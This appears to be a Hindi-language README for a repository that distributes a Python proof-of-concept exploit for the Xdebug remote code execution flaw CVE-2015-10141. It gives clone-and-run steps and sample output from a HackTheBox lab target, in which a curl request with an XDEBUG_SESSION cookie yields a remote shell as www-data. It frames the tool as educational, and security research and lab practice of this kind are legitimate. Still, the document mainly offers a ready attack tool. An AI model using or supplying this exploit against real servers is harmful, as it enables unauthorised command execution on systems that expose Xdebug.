
Xdebug 2.5.5 और उससे पहले के संस्करणों के लिए Proof-of-Concept एक्सप्लॉइट स्क्रिप्ट (CVE-2015-10141)।
Xdebug ≤ 2.5.5 (CVE-2015-10141) के लिए कस्टम Python एक्सप्लॉइट।
इस रिपॉजिटरी में 2.5.5 और उससे पुराने संस्करणों में Xdebug रिमोट कोड निष्पादन भेद्यता के लिए मेरा प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट मौजूद है।
स्क्रिप्ट पोर्ट 9000 पर उजागर अनप्रमाणित डिबगिंग प्रोटोकॉल का लाभ उठाकर रिमोट कमांड निष्पादन प्राप्त करती है।
git clone https://github.com/n0m4d22/PoC-CVE-2015-10141.git
cd PoC-CVE-2015-10141
python3 exploit.py
संकेत मिलने पर, वह टारगेट IP दर्ज करें जहाँ Xdebug होस्ट किया गया है।
मेरे हालिया HackTheBox Olympus (Medium) राइट-अप से प्रदर्शन:
┌──(kali㉿kali)-[~]
└─$ python exploit.py
[*] Target IP: 10.129.124.136
[*] Connecting to 0.0.0.0:9000 ...
[*] Initializing debugging: curl http://10.129.124.136 -H "Cookie: XDEBUG_SESSION=olympus"
[*] Connection to ('10.129.124.136', 36354) established.
$ whoami
www-data
यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों के लिए बनाया गया है।
स्पष्ट प्राधिकरण के बिना सिस्टम के विरुद्ध इस एक्सप्लॉइट का उपयोग न करें। इस कोड के किसी भी दुरुपयोग के लिए मैं ज़िम्मेदार नहीं हूँ।